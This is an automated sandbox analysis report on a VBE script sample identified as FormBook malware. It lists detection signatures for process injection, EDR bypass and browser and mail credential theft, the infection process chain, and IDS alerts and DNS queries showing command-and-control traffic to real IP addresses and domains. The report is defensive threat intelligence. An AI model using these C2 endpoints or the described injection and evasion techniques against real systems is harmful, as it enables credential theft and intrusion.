Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
DOC_114542366.vbe

Overview

General Information

Sample name:DOC_114542366.vbe
Analysis ID:1559545
MD5:76c9e79512fae43cf3418e7ffd2e6d7e
SHA1:83604bad711a92e9ec62a342311c8d3701f75516
SHA256:d6efa90d2b7cf0aabc00d25c40b9cef231ab81b055c6b5e47655630bb1cc62bf
Tags:vbeuser-abuse_ch
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for dropped file
Benign windows process drops PE files
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
.NET source code contains very large strings
AI detected suspicious sample
Allocates memory in foreign processes
Found direct / indirect Syscall (likely to bypass EDR)
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • wscript.exe (PID: 7872 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\DOC_114542366.vbe" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • temp_u8gpg.exe (PID: 8088 cmdline: "C:\Users\user\AppData\Local\Temp\temp_u8gpg.exe" MD5: 36972AB0B73F25F92B42448D6FAAEA58)
      • RegAsm.exe (PID: 8120 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
        • zfEzkYXCOLr.exe (PID: 3700 cmdline: "C:\Program Files (x86)\DkgTwkShXHuYDwaqqanQdFDSSNoagfNaOHzsMlnyQXYDHeHS\zfEzkYXCOLr.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • SearchProtocolHost.exe (PID: 1300 cmdline: "C:\Windows\SysWOW64\SearchProtocolHost.exe" MD5: 727FE964E574EEAF8917308FFF0880DE)
            • zfEzkYXCOLr.exe (PID: 3920 cmdline: "C:\Program Files (x86)\DkgTwkShXHuYDwaqqanQdFDSSNoagfNaOHzsMlnyQXYDHeHS\zfEzkYXCOLr.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
            • firefox.exe (PID: 2884 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
00000006.00000002.3775770307.0000000003310000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000006.00000002.3766152449.0000000002E30000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000007.00000002.3778720033.0000000004E70000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        00000006.00000002.3775867961.0000000003360000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          00000005.00000002.3776047810.0000000005420000.00000040.00000001.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            Click to see the 3 entries
            SourceRuleDescriptionAuthorStrings
            3.2.RegAsm.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
              3.2.RegAsm.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security

                System Summary

                barindex
                Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\DOC_114542366.vbe", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\DOC_114542366.vbe", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2592, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\DOC_114542366.vbe", ProcessId: 7872, ProcessName: wscript.exe
                Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\DOC_114542366.vbe", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\DOC_114542366.vbe", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2592, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\DOC_114542366.vbe", ProcessId: 7872, ProcessName: wscript.exe
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-11-20T16:54:08.618110+010020507451Malware Command and Control Activity Detected192.168.2.1149791156.251.17.22480TCP
                2024-11-20T16:54:33.844204+010020507451Malware Command and Control Activity Detected192.168.2.114985143.163.1.11080TCP
                2024-11-20T16:54:49.321171+010020507451Malware Command and Control Activity Detected192.168.2.114988947.254.140.25580TCP
                2024-11-20T16:55:06.930289+010020507451Malware Command and Control Activity Detected192.168.2.1149925208.91.197.2780TCP
                2024-11-20T16:55:22.299377+010020507451Malware Command and Control Activity Detected192.168.2.1149968172.67.220.3680TCP
                2024-11-20T16:55:37.658446+010020507451Malware Command and Control Activity Detected192.168.2.114999698.124.224.1780TCP
                2024-11-20T16:55:52.637402+010020507451Malware Command and Control Activity Detected192.168.2.1150000203.161.43.22880TCP
                2024-11-20T16:56:08.272690+010020507451Malware Command and Control Activity Detected192.168.2.1150004103.224.182.24280TCP
                2024-11-20T16:56:23.664772+010020507451Malware Command and Control Activity Detected192.168.2.1150008199.59.243.22780TCP
                2024-11-20T16:56:38.575239+010020507451Malware Command and Control Activity Detected192.168.2.115001213.248.169.4880TCP
                2024-11-20T16:56:54.133157+010020507451Malware Command and Control Activity Detected192.168.2.115001638.47.232.19480TCP
                2024-11-20T16:57:09.031955+010020507451Malware Command and Control Activity Detected192.168.2.1150020172.67.159.2480TCP
                2024-11-20T16:57:25.491138+010020507451Malware Command and Control Activity Detected192.168.2.1150024208.91.197.2780TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-11-20T16:54:08.618110+010028554651A Network Trojan was detected192.168.2.1149791156.251.17.22480TCP
                2024-11-20T16:54:33.844204+010028554651A Network Trojan was detected192.168.2.114985143.163.1.11080TCP
                2024-11-20T16:54:49.321171+010028554651A Network Trojan was detected192.168.2.114988947.254.140.25580TCP
                2024-11-20T16:55:06.930289+010028554651A Network Trojan was detected192.168.2.1149925208.91.197.2780TCP
                2024-11-20T16:55:22.299377+010028554651A Network Trojan was detected192.168.2.1149968172.67.220.3680TCP
                2024-11-20T16:55:37.658446+010028554651A Network Trojan was detected192.168.2.114999698.124.224.1780TCP
                2024-11-20T16:55:52.637402+010028554651A Network Trojan was detected192.168.2.1150000203.161.43.22880TCP
                2024-11-20T16:56:08.272690+010028554651A Network Trojan was detected192.168.2.1150004103.224.182.24280TCP
                2024-11-20T16:56:23.664772+010028554651A Network Trojan was detected192.168.2.1150008199.59.243.22780TCP
                2024-11-20T16:56:38.575239+010028554651A Network Trojan was detected192.168.2.115001213.248.169.4880TCP
                2024-11-20T16:56:54.133157+010028554651A Network Trojan was detected192.168.2.115001638.47.232.19480TCP
                2024-11-20T16:57:09.031955+010028554651A Network Trojan was detected192.168.2.1150020172.67.159.2480TCP
                2024-11-20T16:57:25.491138+010028554651A Network Trojan was detected192.168.2.1150024208.91.197.2780TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-11-20T16:54:25.720471+010028554641A Network Trojan was detected192.168.2.114982943.163.1.11080TCP
                2024-11-20T16:54:28.392311+010028554641A Network Trojan was detected192.168.2.114983843.163.1.11080TCP
                2024-11-20T16:54:31.064196+010028554641A Network Trojan was detected192.168.2.114984443.163.1.11080TCP
                2024-11-20T16:54:41.382649+010028554641A Network Trojan was detected192.168.2.114986847.254.140.25580TCP
                2024-11-20T16:54:44.010751+010028554641A Network Trojan was detected192.168.2.114987547.254.140.25580TCP
                2024-11-20T16:54:46.808497+010028554641A Network Trojan was detected192.168.2.114988347.254.140.25580TCP
                2024-11-20T16:54:56.333264+010028554641A Network Trojan was detected192.168.2.1149905208.91.197.2780TCP
                2024-11-20T16:54:58.972415+010028554641A Network Trojan was detected192.168.2.1149912208.91.197.2780TCP
                2024-11-20T16:55:01.585156+010028554641A Network Trojan was detected192.168.2.1149919208.91.197.2780TCP
                2024-11-20T16:55:14.345721+010028554641A Network Trojan was detected192.168.2.1149948172.67.220.3680TCP
                2024-11-20T16:55:16.826377+010028554641A Network Trojan was detected192.168.2.1149954172.67.220.3680TCP
                2024-11-20T16:55:19.682107+010028554641A Network Trojan was detected192.168.2.1149962172.67.220.3680TCP
                2024-11-20T16:55:29.630412+010028554641A Network Trojan was detected192.168.2.114998598.124.224.1780TCP
                2024-11-20T16:55:32.286267+010028554641A Network Trojan was detected192.168.2.114999398.124.224.1780TCP
                2024-11-20T16:55:34.993761+010028554641A Network Trojan was detected192.168.2.114999598.124.224.1780TCP
                2024-11-20T16:55:44.639345+010028554641A Network Trojan was detected192.168.2.1149997203.161.43.22880TCP
                2024-11-20T16:55:47.294594+010028554641A Network Trojan was detected192.168.2.1149998203.161.43.22880TCP
                2024-11-20T16:55:50.046306+010028554641A Network Trojan was detected192.168.2.1149999203.161.43.22880TCP
                2024-11-20T16:56:00.289916+010028554641A Network Trojan was detected192.168.2.1150001103.224.182.24280TCP
                2024-11-20T16:56:02.889986+010028554641A Network Trojan was detected192.168.2.1150002103.224.182.24280TCP
                2024-11-20T16:56:05.733561+010028554641A Network Trojan was detected192.168.2.1150003103.224.182.24280TCP
                2024-11-20T16:56:15.690310+010028554641A Network Trojan was detected192.168.2.1150005199.59.243.22780TCP
                2024-11-20T16:56:18.363418+010028554641A Network Trojan was detected192.168.2.1150006199.59.243.22780TCP
                2024-11-20T16:56:20.993661+010028554641A Network Trojan was detected192.168.2.1150007199.59.243.22780TCP
                2024-11-20T16:56:30.536900+010028554641A Network Trojan was detected192.168.2.115000913.248.169.4880TCP
                2024-11-20T16:56:33.246857+010028554641A Network Trojan was detected192.168.2.115001013.248.169.4880TCP
                2024-11-20T16:56:35.914984+010028554641A Network Trojan was detected192.168.2.115001113.248.169.4880TCP
                2024-11-20T16:56:45.892604+010028554641A Network Trojan was detected192.168.2.115001338.47.232.19480TCP
                2024-11-20T16:56:48.564405+010028554641A Network Trojan was detected192.168.2.115001438.47.232.19480TCP
                2024-11-20T16:56:51.363713+010028554641A Network Trojan was detected192.168.2.115001538.47.232.19480TCP
                2024-11-20T16:57:00.972633+010028554641A Network Trojan was detected192.168.2.1150017172.67.159.2480TCP
                2024-11-20T16:57:03.655325+010028554641A Network Trojan was detected192.168.2.1150018172.67.159.2480TCP
                2024-11-20T16:57:06.448068+010028554641A Network Trojan was detected192.168.2.1150019172.67.159.2480TCP
                2024-11-20T16:57:16.085067+010028554641A Network Trojan was detected192.168.2.1150021208.91.197.2780TCP
                2024-11-20T16:57:18.784281+010028554641A Network Trojan was detected192.168.2.1150022208.91.197.2780TCP
                2024-11-20T16:57:21.459219+010028554641A Network Trojan was detected192.168.2.1150023208.91.197.2780TCP
                2024-11-20T16:57:32.683253+010028554641A Network Trojan was detected192.168.2.1150025185.27.134.14480TCP
                2024-11-20T16:57:36.805343+010028554641A Network Trojan was detected192.168.2.1150026185.27.134.14480TCP

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Source: C:\Users\user\AppData\Local\Temp\temp_u8gpg.exeAvira: detection malicious, Label: TR/Dropper.Gen
                Source: DOC_114542366.vbeReversingLabs: Detection: 18%
                Source: Yara matchFile source: 3.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000006.00000002.3775770307.0000000003310000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.3766152449.0000000002E30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.3778720033.0000000004E70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.3775867961.0000000003360000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.3776047810.0000000005420000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.1574816777.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.1575092395.0000000001680000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.1575820816.0000000006400000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Source: C:\Users\user\AppData\Local\Temp\temp_u8gpg.exeJoe Sandbox ML: detected
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: zfEzkYXCOLr.exe, 00000005.00000000.1497037185.0000000000DEE000.00000002.00000001.01000000.00000009.sdmp, zfEzkYXCOLr.exe, 00000007.00000002.3775116612.0000000000DEE000.00000002.00000001.01000000.00000009.sdmp
                Source: Binary string: wntdll.pdbUGP source: RegAsm.exe, 00000003.00000002.1575193148.0000000002EB0000.00000040.00001000.00020000.00000000.sdmp, SearchProtocolHost.exe, 00000006.00000002.3776253990.000000000380E000.00000040.00001000.00020000.00000000.sdmp, SearchProtocolHost.exe, 00000006.00000002.3776253990.0000000003670000.00000040.00001000.00020000.00000000.sdmp, SearchProtocolHost.exe, 00000006.00000003.1577071302.00000000034C3000.00000004.00000020.00020000.00000000.sdmp, SearchProtocolHost.exe, 00000006.00000003.1575159803.000000000331A000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: RegAsm.exe, RegAsm.exe, 00000003.00000002.1575193148.0000000002EB0000.00000040.00001000.00020000.00000000.sdmp, SearchProtocolHost.exe, SearchProtocolHost.exe, 00000006.00000002.3776253990.000000000380E000.00000040.00001000.00020000.00000000.sdmp, SearchProtocolHost.exe, 00000006.00000002.3776253990.0000000003670000.00000040.00001000.00020000.00000000.sdmp, SearchProtocolHost.exe, 00000006.00000003.1577071302.00000000034C3000.00000004.00000020.00020000.00000000.sdmp, SearchProtocolHost.exe, 00000006.00000003.1575159803.000000000331A000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: SearchProtocolHost.pdbUGP source: zfEzkYXCOLr.exe, 00000005.00000003.1514614257.00000000005BB000.00000004.00000001.00020000.00000000.sdmp
                Source: Binary string: SearchProtocolHost.pdb source: zfEzkYXCOLr.exe, 00000005.00000003.1514614257.00000000005BB000.00000004.00000001.00020000.00000000.sdmp
                Source: Binary string: VXCVY2334.pdb source: temp_u8gpg.exe, 00000002.00000000.1408500684.0000000000D32000.00000002.00000001.01000000.00000006.sdmp, temp_u8gpg.exe.0.dr
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_02E4CB30 FindFirstFileW,FindNextFileW,FindClose,6_2_02E4CB30

                Software Vulnerabilities

                barindex
                Source: C:\Windows\System32\wscript.exeChild: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 4x nop then xor eax, eax6_2_02E39EC0
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 4x nop then mov ebx, 00000004h6_2_034604CE

                Networking

                barindex
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.11:49868 -> 47.254.140.255:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.11:49883 -> 47.254.140.255:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.11:49875 -> 47.254.140.255:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.11:49968 -> 172.67.220.36:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.11:49968 -> 172.67.220.36:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.11:50004 -> 103.224.182.242:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.11:50004 -> 103.224.182.242:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.11:50001 -> 103.224.182.242:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.11:49838 -> 43.163.1.110:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.11:49985 -> 98.124.224.17:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.11:50026 -> 185.27.134.144:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.11:50011 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.11:49791 -> 156.251.17.224:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.11:49844 -> 43.163.1.110:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.11:50017 -> 172.67.159.24:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.11:49791 -> 156.251.17.224:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.11:49996 -> 98.124.224.17:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.11:49851 -> 43.163.1.110:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.11:49851 -> 43.163.1.110:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.11:49995 -> 98.124.224.17:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.11:49999 -> 203.161.43.228:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.11:50000 -> 203.161.43.228:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.11:50002 -> 103.224.182.242:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.11:50000 -> 203.161.43.228:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.11:50021 -> 208.91.197.27:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.11:49996 -> 98.124.224.17:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.11:49954 -> 172.67.220.36:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.11:50024 -> 208.91.197.27:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.11:50024 -> 208.91.197.27:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.11:49829 -> 43.163.1.110:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.11:50022 -> 208.91.197.27:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.11:49948 -> 172.67.220.36:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.11:49919 -> 208.91.197.27:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.11:50010 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.11:49962 -> 172.67.220.36:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.11:50006 -> 199.59.243.227:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.11:50016 -> 38.47.232.194:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.11:50016 -> 38.47.232.194:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.11:50007 -> 199.59.243.227:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.11:50013 -> 38.47.232.194:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.11:49993 -> 98.124.224.17:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.11:49998 -> 203.161.43.228:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.11:50003 -> 103.224.182.242:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.11:49905 -> 208.91.197.27:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.11:50009 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.11:50019 -> 172.67.159.24:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.11:49997 -> 203.161.43.228:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.11:50005 -> 199.59.243.227:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.11:49912 -> 208.91.197.27:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.11:50015 -> 38.47.232.194:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.11:50014 -> 38.47.232.194:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.11:50020 -> 172.67.159.24:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.11:50020 -> 172.67.159.24:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.11:50023 -> 208.91.197.27:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.11:50008 -> 199.59.243.227:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.11:50008 -> 199.59.243.227:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.11:50025 -> 185.27.134.144:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.11:50012 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.11:50012 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.11:50018 -> 172.67.159.24:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.11:49889 -> 47.254.140.255:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.11:49889 -> 47.254.140.255:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.11:49925 -> 208.91.197.27:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.11:49925 -> 208.91.197.27:80
                Source: DNS query: www.duwixushx.xyz
                Source: DNS query: www.aiactor.xyz
                Source: DNS query: www.amayavp.xyz
                Source: Joe Sandbox ViewIP Address: 13.248.169.48 13.248.169.48
                Source: Joe Sandbox ViewIP Address: 103.224.182.242 103.224.182.242
                Source: Joe Sandbox ViewASN Name: AMAZON-02US AMAZON-02US
                Source: Joe Sandbox ViewASN Name: WILDCARD-ASWildcardUKLimitedGB WILDCARD-ASWildcardUKLimitedGB
                Source: Joe Sandbox ViewASN Name: TRELLIAN-AS-APTrellianPtyLimitedAU TRELLIAN-AS-APTrellianPtyLimitedAU
                Source: Joe Sandbox ViewASN Name: BODIS-NJUS BODIS-NJUS
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
